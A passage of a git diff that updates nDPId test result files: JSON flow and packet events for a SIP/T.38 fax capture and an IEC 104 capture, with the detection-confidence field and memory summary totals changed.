WNhdGlvbi94bWwsIGFwcGxpY2F0aW9uL2R0bWYtcmVsYXkNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vc2RwDQpDb250ZW50LUxlbmd0aDogMjQwDQoNCnY9MA0Kbz0tIDE5MSAxMjI4NTAwNzM2IElOIElQNCAxMC4yMy4xLjUyDQpzPUlNU1MNCmM9SU4gSVA0IDEwLjIzLjEuNTINCnQ9MCAwDQptPWF1ZGlvIDE2NzU2IFJUUC9BVlAgOCAxMDMgMTAyDQphPXJ0cG1hcDoxMDMgRzcyNi0zMi84MDAwDQphPXB0aW1lOjMwDQphPXJ0cG1hcDoxMDIgdGVsZXBob25lLWV2ZW50LzgwMDAvMQ0KYT1mbXRwOjEwMiAwLTE1DQphPXNxbjowDQphPWNkc2M6MSBpbWFnZSB1ZHB0bCB0MzgNCg=="} 00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1228468958657,"flow_last_seen":1228468958657,"flow_idle_time":200000,"flow_min_l4_payload_len":884,"flow_max_l4_payload_len":884,"flow_tot_l4_payload_len":884,"flow_avg_l4_payload_len":884,"midstream":0,"thread_ts_msec":1228468958657,"l3_proto":"ip4","src_ip":"138.132.169.101","dst_ip":"192.168.100.219","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1228468958657,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":926,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":926,"pkt_l4_len":892,"thread_ts_msec":1228468958657,"pkt":"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"} 
-00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1228468958657,"flow_last_seen":1228468958657,"flow_idle_time":200000,"flow_min_l4_payload_len":884,"flow_max_l4_payload_len":884,"flow_tot_l4_payload_len":884,"flow_avg_l4_payload_len":884,"midstream":0,"thread_ts_msec":1228468958657,"l3_proto":"ip4","src_ip":"138.132.169.101","dst_ip":"192.168.100.219","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1228468958657,"flow_last_seen":1228468958657,"flow_idle_time":200000,"flow_min_l4_payload_len":884,"flow_max_l4_payload_len":884,"flow_tot_l4_payload_len":884,"flow_avg_l4_payload_len":884,"midstream":0,"thread_ts_msec":1228468958657,"l3_proto":"ip4","src_ip":"138.132.169.101","dst_ip":"192.168.100.219","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 
00808{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1228468958657,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":304,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":304,"pkt_l4_len":270,"thread_ts_msec":1228468958657,"pkt":"AAFbASs3ABEKVkXRCABFAAEild5AAEARPsYKIyjICiMoGRPEE8QBDkoYU0lQLzIuMCAxMDAgVHJ5aW5nDQpWaWE6IFNJUC8yLjAvVURQIDEwLjM1LjYwLjcyOjUwNjA7YnJhbmNoPXo5aEc0YksuaUlpSWlJLjBhMjMyODE5LmU5ZDRiZA0KVG86IDxzaXA6MDYxOTYzMTc3QGl0YWx0ZWwuaXQ7dXNlcj1waG9uZT4NCkZyb206IDxzaXA6dW5hdmFpbGFibGVAaG9zdHBvcnRpb24+O3RhZz0wMGU5ZDQ3OA0KQ2FsbC1JRDogMDBlOWQ0YTUwMGU5ZDQ4LTAwMTUtMDAwMS0wMDAwLTAwMDBAMTAuMzUuNDAuMjUNCkNTZXE6IDEgSU5WSVRFDQoNCg=="} 00853{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1228468958718,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":1228468958718,"pkt":"AAglAXLkABZGR+C\/CABFuAFFHeUAAD0RBJ7AqGTbioSpZRPEE8QBMRfZU0lQLzIuMCAxMDAgVHJ5aW5nDQpDYWxsLUlEOiBTRDQ5MDk3MDEtOWZmMTFiZjcyZWI0YTM0N2M5Mjk3NGQ4ZmJiYzI2NjgtYW84bzNpMQ0KQ29udGVudC1MZW5ndGg6IDANCkNTZXE6IDEgSU5WSVRFDQpGcm9tOiA8c2lwOnVuYXZhaWxhYmxlQGhvc3Rwb3J0aW9uPjt0YWc9U0Q0OTA5NzAxLTAwZTlkNDc4DQpUbzogPHNpcDowNjE5NjMxNzdAaXRhbHRlbC5pdDt1c2VyPXBob25lPg0KVmlhOiBTSVAvMi4wL1VEUCAxMzguMTMyLjE2OS4xMDE6NTA2MDticmFuY2g9ejloRzRiS2Z2MmY0MDEwNzg3aDNhOHExMjgwLjENCg0K"} 
01029{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1228468958819,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":469,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":469,"pkt_l4_len":435,"thread_ts_msec":1228468958819,"pkt":"AAglAXLkABZGR+C\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"} 01052{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1228468958820,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":488,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":488,"pkt_l4_len":454,"thread_ts_msec":1228468958820,"pkt":"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"} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1228468965434,"flow_last_seen":1228468965434,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1228468965434,"l3_proto":"ip4","src_ip":"10.35.60.100","dst_ip":"10.23.1.52","src_port":15580,"dst_port":16756,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00689{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1228468965434,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1228468965434,"pkt":"ABgYesP\/AAglAXLqCABFuADIHecAAD0RDLUKIzxkChcBNDzcQXQAtEC7gAgAAGfPFaAOrw6v1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1Q=="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1228468965434,"flow_last_seen":1228468965434,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1228468965434,"l3_proto":"ip4","src_ip":"10.35.60.100","dst_ip":"10.23.1.52","src_port":15580,"dst_port":16756,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1228468965434,"flow_last_seen":1228468965434,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1228468965434,"l3_proto":"ip4","src_ip":"10.35.60.100","dst_ip":"10.23.1.52","src_port":15580,"dst_port":16756,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 00689{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1228468965455,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1228468965455,"pkt":"ABgYesP\/AAglAXLqCABFuADIHegAAD0RDLQKIzxkChcBNDzcQXQAtEAagAgAAWfPFkAOrw6v1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1Q=="} 00689{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1228468965474,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1228468965474,"pkt":"ABgYesP\/AAglAXLqCABFuADIHekAAD0RDLMKIzxkChcBNDzcQXQAtD95gAgAAmfPFuAOrw6v1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1Q=="} 
-00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7217,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":6995,"flow_first_seen":1228468965434,"flow_last_seen":1228469042419,"flow_idle_time":200000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":1100399,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1228469046884,"l3_proto":"ip4","src_ip":"10.35.60.100","dst_ip":"10.23.1.52","src_port":15580,"dst_port":16756,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7217,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":130,"flow_first_seen":1228468937630,"flow_last_seen":1228469046884,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":541,"flow_tot_l4_payload_len":18110,"flow_avg_l4_payload_len":139,"midstream":0,"thread_ts_msec":1228469046884,"l3_proto":"ip4","src_ip":"10.35.40.22","dst_ip":"10.23.1.42","src_port":2944,"dst_port":2944,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Megaco","breed":"Acceptable","category":"VoIP"}} 
-00708{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7217,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1228468958657,"flow_last_seen":1228469042442,"flow_idle_time":200000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":884,"flow_tot_l4_payload_len":12177,"flow_avg_l4_payload_len":529,"midstream":0,"thread_ts_msec":1228469046884,"l3_proto":"ip4","src_ip":"138.132.169.101","dst_ip":"192.168.100.219","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7217,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":46,"flow_first_seen":1228468958651,"flow_last_seen":1228469042445,"flow_idle_time":200000,"flow_min_l4_payload_len":262,"flow_max_l4_payload_len":881,"flow_tot_l4_payload_len":24540,"flow_avg_l4_payload_len":533,"midstream":0,"thread_ts_msec":1228469046884,"l3_proto":"ip4","src_ip":"10.35.40.25","dst_ip":"10.35.40.200","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 
-00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7217,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1228468958651,"flow_last_seen":1228469042444,"flow_idle_time":200000,"flow_min_l4_payload_len":262,"flow_max_l4_payload_len":881,"flow_tot_l4_payload_len":12270,"flow_avg_l4_payload_len":533,"midstream":0,"thread_ts_msec":1228469046884,"l3_proto":"ip4","src_ip":"10.35.60.72","dst_ip":"10.35.60.100","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7217,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":6995,"flow_first_seen":1228468965434,"flow_last_seen":1228469042419,"flow_idle_time":200000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":1100399,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1228469046884,"l3_proto":"ip4","src_ip":"10.35.60.100","dst_ip":"10.23.1.52","src_port":15580,"dst_port":16756,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 
+00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7217,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":130,"flow_first_seen":1228468937630,"flow_last_seen":1228469046884,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":541,"flow_tot_l4_payload_len":18110,"flow_avg_l4_payload_len":139,"midstream":0,"thread_ts_msec":1228469046884,"l3_proto":"ip4","src_ip":"10.35.40.22","dst_ip":"10.23.1.42","src_port":2944,"dst_port":2944,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Megaco","breed":"Acceptable","category":"VoIP"}} +00708{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7217,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1228468958657,"flow_last_seen":1228469042442,"flow_idle_time":200000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":884,"flow_tot_l4_payload_len":12177,"flow_avg_l4_payload_len":529,"midstream":0,"thread_ts_msec":1228469046884,"l3_proto":"ip4","src_ip":"138.132.169.101","dst_ip":"192.168.100.219","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 
+00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7217,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":46,"flow_first_seen":1228468958651,"flow_last_seen":1228469042445,"flow_idle_time":200000,"flow_min_l4_payload_len":262,"flow_max_l4_payload_len":881,"flow_tot_l4_payload_len":24540,"flow_avg_l4_payload_len":533,"midstream":0,"thread_ts_msec":1228469046884,"l3_proto":"ip4","src_ip":"10.35.40.25","dst_ip":"10.35.40.200","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7217,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1228468958651,"flow_last_seen":1228469042444,"flow_idle_time":200000,"flow_min_l4_payload_len":262,"flow_max_l4_payload_len":881,"flow_tot_l4_payload_len":12270,"flow_avg_l4_payload_len":533,"midstream":0,"thread_ts_msec":1228469046884,"l3_proto":"ip4","src_ip":"10.35.60.72","dst_ip":"10.35.60.100","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 
00586{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":7217,"source":"FAX-Call-t38-CA-TDM-SIP-FB-1.pcap","alias":"nDPId-test","packets-captured":7217,"packets-processed":7217,"total-skipped-flows":0,"total-l4-payload-len":1167496,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":5,"total-idle-flows":5,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":33,"global_ts_msec":1228469046884} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 7217/7217 @@ -39,9 +39,9 @@ ~~ total active/idle flows...: 5/5 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6082976 bytes -~~ total memory freed........: 6082976 bytes -~~ total allocations/frees...: 125347/125347 +~~ total memory allocated....: 6216610 bytes +~~ total memory freed........: 6216610 bytes +~~ total allocations/frees...: 128109/128109 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 484 chars ~~ json string max len.......: 1641 chars diff --git a/test/results/IEC104.pcap.out b/test/results/IEC104.pcap.out index e58a6bf3f..22f7c1098 100644 --- a/test/results/IEC104.pcap.out +++ b/test/results/IEC104.pcap.out 
@@ -5,13 +5,13 @@ 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317629088520,"flow_last_seen":1317629088520,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1317629088520,"l3_proto":"ip4","src_ip":"10.175.211.3","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54769,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1317629088520,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1317629088520,"pkt":"eCvLK7lWABIAxkrACABFAAAoSx9AAH0GYW0Kr9MDCndpGglk1fFZgPwe3z\/\/ZlAQ+y9PxQAAAAAAAAAA"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1317629088532,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1317629088532,"pkt":"eCvLK7lWABIAxkrACABFAAAuUsZAAH0GWcIKr9MBCndpGglk1fBIoLt3AFkTVVAY\/em9wgAAaAQBAEK5"} 
-00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1317629088495,"flow_last_seen":1317629088532,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1317629088532,"l3_proto":"ip4","src_ip":"10.175.211.1","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54768,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1317629088495,"flow_last_seen":1317629088532,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1317629088532,"l3_proto":"ip4","src_ip":"10.175.211.1","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54768,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1317629088536,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1317629088536,"pkt":"eCvLK7lWABIAxkrACABFAAAuSyRAAH0GYWIKr9MDCndpGglk1fFZgPwe3z\/\/ZlAY+y+j+QAAaAQBAEK5"} 
-00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1317629088520,"flow_last_seen":1317629088536,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1317629088536,"l3_proto":"ip4","src_ip":"10.175.211.3","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54769,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1317629088520,"flow_last_seen":1317629088536,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1317629088536,"l3_proto":"ip4","src_ip":"10.175.211.3","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54769,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1317629088731,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1317629088731,"pkt":"AAAMB6wBeCvLK7lWCABFAAAoJ9JAAIAGAAAKd2kaCq\/TAdXwCWQAWRNVSKC7fVAQAP5RXAAA"} 
00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1317629088739,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1317629088739,"pkt":"AAAMB6wBeCvLK7lWCABFAAAoJ9tAAIAGAAAKd2kaCq\/TA9XxCWTfP\/9mWYD8JFAQAP5RXgAA"} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":15,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1317629088495,"flow_last_seen":1317629090498,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":252,"flow_tot_l4_payload_len":603,"flow_avg_l4_payload_len":50,"midstream":1,"thread_ts_msec":1317629090498,"l3_proto":"ip4","src_ip":"10.175.211.1","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54768,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":15,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1317629088520,"flow_last_seen":1317629088739,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1317629090498,"l3_proto":"ip4","src_ip":"10.175.211.3","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54769,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} 
